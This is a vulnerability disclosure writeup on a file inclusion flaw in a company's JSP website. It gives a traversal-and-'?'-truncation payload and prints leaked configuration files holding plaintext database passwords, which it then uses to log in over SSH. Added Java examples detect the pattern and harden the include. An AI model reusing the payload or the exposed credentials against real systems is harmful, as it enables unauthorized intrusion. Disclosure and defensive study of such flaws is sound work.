File Inclusion on the official website of cutting-edge Tongchuang technology results in obtaining the Server shell



Vendor, could I ask for a small gift? A newbie doesn't mind if no gift arrives -.-

Asking a big vendor.

Attackers can access the database and log on to the SSH server.


Attackers exploit the File Inclusion Vulnerability.



Problem page: http://www.vasee.com/event/view.jsp?day=2014-08-03&emid=ff80808146ac6f014770b306751ec2&id=ff80808146acac6f014770b305231eb8&sub=

The sub parameter is the one that gets included.

Passing sub=index produces a page error.

So we can guess that the processing code is

'/event/view_sub/view_' + sub parameter + '.jsp'

After submitting sub=1 the page displays normally, which proves that view_1.jsp exists in the /event/view_sub/ directory.

So the guess is correct.

Then I tried to construct an include path. I was stuck here for a long time: the include could not escape the event directory. The web server is Tomcat, so the configuration files under conf could not be read this way.

Later, I tried constructing the following parameter.

sub=/.../../WEB-INF/web.xml?

With this, the included path becomes /event/view_sub/view_/.../../WEB-INF/web.xml?.jsp

The ? acts as a pseudo-truncation: the container treats everything after it as a query string, so the appended .jsp suffix no longer counts. This truncation works for script files and for files such as .xml, .txt, .css, .js and .html.
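As an added example that is not part of the writeup, a small Java check a defender could run over Tomcat access-log lines to spot requests whose sub parameter carries the traversal or ? truncation pattern described above. The log lines are constructed for the example, and the log format and field layout are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example, not from the writeup: flags access-log requests whose 'sub'
// parameter looks like the traversal / "?" truncation pattern described above.
public class SubParamDetector {
    // Request target from a common-log-format line (assumed log layout).
    private static final Pattern REQUEST = Pattern.compile("\"(?:GET|POST) (\\S+) HTTP/");
    // The 'sub' query parameter, raw (still percent-encoded).
    private static final Pattern SUB_PARAM = Pattern.compile("[?&]sub=([^&\\s]*)");

    // A legitimate sub value is a short page id; anything that can change the
    // resolved path or cut off the ".jsp" suffix is suspicious.
    static boolean isSuspiciousSub(String value) {
        String decoded;
        try {
            decoded = URLDecoder.decode(value, StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return true; // malformed percent-encoding is itself worth a look
        }
        String lower = decoded.toLowerCase();
        return lower.contains("..") || lower.contains("/") || lower.contains("\\")
            || lower.contains("?") || lower.contains("\0") || lower.contains("web-inf");
    }

    // Returns the log lines that should raise an alert.
    static List<String> flag(List<String> logLines) {
        List<String> hits = new ArrayList<>();
        for (String line : logLines) {
            Matcher m = REQUEST.matcher(line);
            if (!m.find()) continue;
            Matcher p = SUB_PARAM.matcher(m.group(1));
            if (p.find() && isSuspiciousSub(p.group(1))) hits.add(line);
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample lines; the second one carries the encoded traversal.
        List<String> sample = List.of(
            "203.0.113.5 - - [03/Aug/2014:10:00:01 +0800] \"GET /event/view.jsp?day=2014-08-03&sub=1 HTTP/1.1\" 200 4821",
            "203.0.113.5 - - [03/Aug/2014:10:00:07 +0800] \"GET /event/view.jsp?day=2014-08-03&sub=%2F..%2F..%2FWEB-INF%2Fweb.xml%3F HTTP/1.1\" 200 3102",
            "203.0.113.5 - - [03/Aug/2014:10:00:09 +0800] \"GET /event/view.jsp?day=2014-08-03&sub=index HTTP/1.1\" 500 612"
        );
        for (String hit : flag(sample)) System.out.println("ALERT " + hit);
    }
}
```

Only the second sample line is flagged; the sub=index request returns 500 but carries no path or truncation characters, which matches the page error the writeup saw for a non-existent sub-page.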


 

<context-param>
  <param-name>uploadPath</param-name>
  <param-value>/var/www/html/vasee_pics/</param-value>
  <!-- <param-value>D:\upload\</param-value> -->
</context-param>
<context-param>
  <param-name>pdfPath</param-name>
  <param-value>/user/local/vasee_pdfs/</param-value>
  <!-- <param-value>d:\xx\</param-value> -->
</context-param>
<context-param>
  <param-name>exlPath</param-name>
  <param-value>/user/local/vasee_exls/</param-value>
  <!-- <param-value>D:\upload\</param-value> -->
</context-param>
<filter>
  <filter-name>SetCharacterEncoding</filter-name>
  <filter-class>com.vasee.filters.SetCharacterEncodingFilter</filter-class>
  <init-param>
    <param-name>encoding</param-name>
    <param-value>UTF-8</param-value>
  </init-param>
</filter>
<!-- Filters for the display tag functionality -->
<filter>
  <filter-name>ResponseOverrideFilter</filter-name>
  <filter-class>org.displaytag.filter.ResponseOverrideFilter</filter-class>
</filter>
<filter>
  <filter-name>hibernatesession</filter-name>
  <filter-class>org.springframework.orm.hibernate3.support.OpenSessionInViewFilter</filter-class>
</filter>
<filter-mapping>
  <filter-name>hibernatesession</filter-name>
  <url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
  <filter-name>SetCharacterEncoding</filter-name>
  <url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
  <filter-name>SetCharacterEncoding</filter-name>
  <url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
  <filter-name>ResponseOverrideFilter</filter-name>
  <url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
  <filter-name>ResponseOverrideFilter</filter-name>
  <url-pattern>*.jsp</url-pattern>
</filter-mapping>
<!-- Pseudo-static filtering -->
<filter>
  <filter-name>UrlRewriteFilter</filter-name>
  <filter-class>org.tuckey.web.filters.urlrewrite.UrlRewriteFilter</filter-class>
  <init-param>
    <param-name>confPath</param-name>
    <param-value>/WEB-INF/urlrewrite.xml</param-value>
  </init-param>
</filter>
<filter-mapping>
  <filter-name>UrlRewriteFilter</filter-name>
  <url-pattern>/g/*</url-pattern>
</filter-mapping>
<servlet>
  <servlet-name>DrawImageServlet</servlet-name>
  <servlet-class>net.sourceforge.jimagetaglib.servlet.DrawImageServlet</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>DrawImageServlet</servlet-name>
  <url-pattern>/jit</url-pattern>
</servlet-mapping>
<!-- Action Servlet Configuration -->
<servlet>
  <servlet-name>action</servlet-name>
  <servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
  <init-param>
    <param-name>config</param-name>
    <param-value>/WEB-INF/struts-config.xml</param-value>
  </init-param>
  <init-param>
    <param-name>debug</param-name>
    <param-value>2</param-value>
  </init-param>
  <init-param>
    <param-name>validate</param-name>
    <param-value>true</param-value>
  </init-param>
</servlet>
<!-- Action Servlet Mapping -->
<servlet-mapping>
  <servlet-name>action</servlet-name>
  <url-pattern>*.do</url-pattern>
</servlet-mapping>
<context-param>
  <param-name>contextConfigLocation</param-name>
  <param-value>/WEB-INF/applicationContext.xml</param-value>
</context-param>
<listener>
  <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
</listener>

Look at the first entry:

<context-param><param-name>uploadPath</param-name><param-value>/var/www/html/vasee_pics/</param-value><!--<param-value>D:\upload\</param-value>--></context-param>





This directory is the one the pics.vasee.com domain uses to store images.

An idea came up. Every upload point on the official site is vulnerable and accepts .jsp files, but annoyingly the uploaded .jsp files are served as images when accessed. Now that the upload directory is known, and both domain names resolve to the same server IP, the inclusion vulnerability could in principle include an uploaded .jsp to obtain a shell. But as noted above, the include cannot escape the event directory, so this path was dropped.



Next, look through the contents of web.xml one entry at a time.

This entry stands out:


 

<context-param><param-name>contextConfigLocation</param-name><param-value>/WEB-INF/applicationContext.xml</param-value></context-param>





Including that file and reading its contents, I was lucky enough to find another sensitive file referenced.


 

<bean id="propertyConfigurer" class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer"><property name="locations"><list><value>/WEB-INF/config.properties</value></list></property></bean>





OK. Continue reading the content of this file!

Guess what the content is?


 

subDomain.id=1006
hibernate.connection.driver_class org.postgresql.Driver
hibernate.connection.username=postgres
#hibernate.connection.url=jdbc\:postgresql\://127.0.0.1/test
hibernate.connection.url=jdbc\:postgresql\://127.0.0.1/vaseedbstable
#hibernate.connection.url=jdbc\:postgresql\://103.31.201.95/test
#hibernate.connection.password=123456
hibernate.connection.password=e2010ee_yan
#hibernate.connection.password=root
#hibernate.connection.password=voasseeee
#hibernate.connection.password=vpaosseteg
phoneapp.android.version=1.1
phoneapp.iphone.version=1.1
phoneapp.android.update_url=http://down.mumayi.com/94512
phoneapp.iphone.update_url=https://itunes.apple.com/cn/app/vasee/id488543987?mt=8
#font.src.path=c\:/windows/fonts/
font.src.path=/user/local/vasee_pdfs/source/



Database connection information! Great!

But tragedy strikes again: the database port is not open externally.

Then I thought of connecting to its SSH port (I recall seeing on some web page that PostgreSQL's postgres user exists as a system account).

I don't know whether that's true -.-



The connection then succeeded. The privileges are those of the database account.

The username is ipvs.

The password is not the database password

hibernate.connection.password=e2010ee_yan

but this commented-out one:

#hibernate.connection.password=vpaosseteg

This lets you view the web code, modify it freely, and operate the database at will.

A last few screenshots: 0.0

<jsp:include page="/event/view_sub/view_${sub}.jsp"/>

This is the inclusion code. I don't understand JSP well enough to say why it cannot cross directories here.

Solution:

Filter the included parameter, restrict the IP addresses allowed to connect to SSH, filter file uploads, and change the passwords. Although no exploitation point has been found for the uploads yet, it is hard to say about the future. Finally, I ask the vendor to trust me: I didn't even look at the database contents. I connected to the database, took a screenshot, and logged out.
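The include concatenation described earlier and the "filter the included parameter" fix, as an added Java example that is not the vendor's code: it models how the page attribute expands, shows why a ? drops the appended .jsp suffix, and adds an allowlist check for sub. The class name, the allowlist values, and the assumption that the legitimate sub-pages are view_1.jsp, view_2.jsp, ... are hypothetical.

```java
import java.util.Set;
import java.util.regex.Pattern;

// Added example (not the vendor's code): models the include behaviour described in
// the writeup and shows the allowlist check the "filter the inclusion" fix calls for.
public class SubInclude {

    // Mirrors the pattern the writeup reports:
    //   <jsp:include page="/event/view_sub/view_${sub}.jsp"/>
    static final String PREFIX = "/event/view_sub/view_";
    static final String SUFFIX = ".jsp";

    // Vulnerable form: raw concatenation, exactly what the page attribute expands to.
    static String vulnerableIncludePath(String sub) {
        return PREFIX + sub + SUFFIX;
    }

    // A RequestDispatcher path is split at the first '?': everything after it is a
    // query string, so the appended ".jsp" no longer names the resource. This helper
    // returns the resource name the container actually looks up.
    static String dispatchedResource(String includePath) {
        int q = includePath.indexOf('?');
        return q < 0 ? includePath : includePath.substring(0, q);
    }

    // Hardened form: 'sub' must be a short alphanumeric token AND one of the known
    // sub-pages. Path separators, "..", "?", "%", NUL and whitespace never reach the
    // include. The allowlist values are hypothetical.
    static final Pattern SAFE_SUB = Pattern.compile("[A-Za-z0-9]{1,16}");
    static final Set<String> KNOWN_SUBS = Set.of("1", "2", "3");

    static String safeIncludePath(String sub) {
        if (sub == null || !SAFE_SUB.matcher(sub).matches() || !KNOWN_SUBS.contains(sub)) {
            throw new IllegalArgumentException("rejected sub parameter");
        }
        return PREFIX + sub + SUFFIX;
    }

    public static void main(String[] args) {
        String[] inputs = {"1", "index", "/../../WEB-INF/web.xml?"};
        for (String s : inputs) {
            String raw = vulnerableIncludePath(s);
            System.out.println("sub=" + s);
            System.out.println("  concatenated: " + raw);
            System.out.println("  dispatched:   " + dispatchedResource(raw));
            try {
                System.out.println("  hardened:     " + safeIncludePath(s));
            } catch (IllegalArgumentException e) {
                System.out.println("  hardened:     " + e.getMessage());
            }
        }
    }
}
```

In the JSP itself the include would then read the validated value rather than the raw parameter, for example by computing the path with safeIncludePath(request.getParameter("sub")) in a scriptlet and passing that result to the page attribute, so an invalid sub fails before any include is attempted.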
